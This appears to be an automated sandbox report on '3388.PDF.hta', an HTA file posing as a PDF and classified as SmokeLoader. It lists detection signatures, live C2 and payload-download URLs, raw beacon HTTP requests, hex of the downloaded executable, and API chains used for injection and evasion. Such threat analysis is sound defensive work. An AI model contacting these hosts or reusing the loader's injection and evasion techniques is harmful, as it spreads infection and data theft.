Windows Analysis Report
3388.PDF.hta

Overview

General Information

Sample name: 3388.PDF.hta
renamed because original name is a hash value
Original sample name: _011024_i_01_10_2024___UA973248410000000026006263388.PDF.hta
Analysis ID: 1524029
MD5: 35ef7b98b8eabb06a41f4b0cecace704
SHA1: 5668a7317fb91f8be783ff93289dad41d5ea6108
SHA256: c40dff83b1bb399b942ba22b7d03be530e35a04d9e0862789efada5896cd7eb6
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\vgjfftu Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Avira: detection malicious, Label: HEUR/AGEN.1312567
Found malware configuration
Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
Multi AV Scanner detection for domain / URL
Source: unicexpertmagazine.pw Virustotal: Detection: 9% Perma Link
Source: http://ukr-net-filesrever.pw/download/svc.exe Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Virustotal: Detection: 36% Perma Link
Source: C:\Users\user\AppData\Roaming\vgjfftu Virustotal: Detection: 36% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\vgjfftu Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49162 -> 185.219.7.204:80
Source: Network traffic Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49163 -> 185.219.7.204:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: openclehardware.ru
Source: C:\Windows\explorer.exe Domain query: ceoconstractionstore.pl
Source: C:\Windows\explorer.exe Domain query: unicexpertmagazine.pw
Source: C:\Windows\explorer.exe Domain query: informcoopirationunicolceo.ru
Source: C:\Windows\explorer.exe Network Connect: 185.219.7.204 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://unicexpertmagazine.pw/index.php
Source: Malware configuration extractor URLs: http://ceoconstractionstore.pl/index.php
Source: Malware configuration extractor URLs: http://openclehardware.ru/index.php
Source: Malware configuration extractor URLs: http://informcoopirationunicolceo.ru/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Wed, 02 Oct 2024 10:25:20 GMTContent-Type: application/x-msdos-programContent-Length: 222720Connection: closeLast-Modified: Wed, 02 Oct 2024 05:06:08 GMTETag: "36600-62377654eb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 a7 01 00 50 00 00 00 00 50 11 00 e0 a1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a4 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 7e 01 00 00 10 00 00 00 80 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 20 00 00 00 90 01 00 00 22 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 7f 0f 00 00 c0 01 00 00 18 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 40 11 00 00 06 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 a1 01 00 00 50 11 00 00 a2 01 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: ukr-net-filesrever.pwConnection: Keep-Alive
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 185.219.7.204:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://navjbpyetuaao.org/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: unicexpertmagazine.pw
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kwbsyhfpuedti.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: unicexpertmagazine.pw
Source: global traffic HTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: ukr-net-filesrever.pwConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ukr-net-filesrever.pw
Source: global traffic DNS traffic detected: DNS query: unicexpertmagazine.pw
Source: global traffic DNS traffic detected: DNS query: ceoconstractionstore.pl
Source: global traffic DNS traffic detected: DNS query: openclehardware.ru
Source: global traffic DNS traffic detected: DNS query: informcoopirationunicolceo.ru
Source: unknown HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://navjbpyetuaao.org/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: unicexpertmagazine.pw
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 02 Oct 2024 10:25:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.392682461.0000000002911000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.392682461.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.392682461.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.392682461.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ukr-net-filesrever.pw
Source: powershell.exe, 00000001.00000002.390878362.0000000000565000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ukr-net-filesrever.pw/download/svc.exe
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000000.405597987.0000000003B98000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com0
Source: 3388.PDF.hta String found in binary or memory: http://www.pgdp.net
Source: explorer.exe, 00000005.00000000.405739079.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.406299609.0000000007902000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.405400637.000000000260E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000005.00000000.405739079.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.406299609.0000000007902000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.405400637.000000000260E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000005.00000000.405400637.000000000260E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Creates a window with clipboard capturing capabilities
Source: C:\Windows\SysWOW64\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\EkXH.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\mshta.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401529
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00402FFA RtlCreateUserThread,NtTerminateProcess, 4_2_00402FFA
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401541
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401545
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401553
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00402379 NtQuerySystemInformation, 4_2_00402379
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0040237B NtQuerySystemInformation, 4_2_0040237B
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0040332A GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQueryInformationProcess,NtQueryKey,RtlCreateUserThread,wcsstr, 4_2_0040332A
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401534
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014DB
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_004020EA NtQuerySystemInformation, 4_2_004020EA
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00402387 NtQuerySystemInformation, 4_2_00402387
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00402397 NtQuerySystemInformation, 4_2_00402397
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0040239B NtQuerySystemInformation, 4_2_0040239B
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0040239E NtQuerySystemInformation, 4_2_0040239E
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_00401529
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00402FFA RtlCreateUserThread,NtTerminateProcess, 8_2_00402FFA
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_00401541
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_00401545
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_00401553
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00402379 NtQuerySystemInformation, 8_2_00402379
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0040237B NtQuerySystemInformation, 8_2_0040237B
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0040332A GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQueryInformationProcess,NtQueryKey,RtlCreateUserThread,wcsstr,towlower, 8_2_0040332A
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_00401534
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_004014DB
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_004020EA NtQuerySystemInformation, 8_2_004020EA
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00402387 NtQuerySystemInformation, 8_2_00402387
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00402397 NtQuerySystemInformation, 8_2_00402397
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0040239B NtQuerySystemInformation, 8_2_0040239B
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0040239E NtQuerySystemInformation, 8_2_0040239E
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00418A70 4_2_00418A70
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00418A70 8_2_00418A70
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Yara signature match
Source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
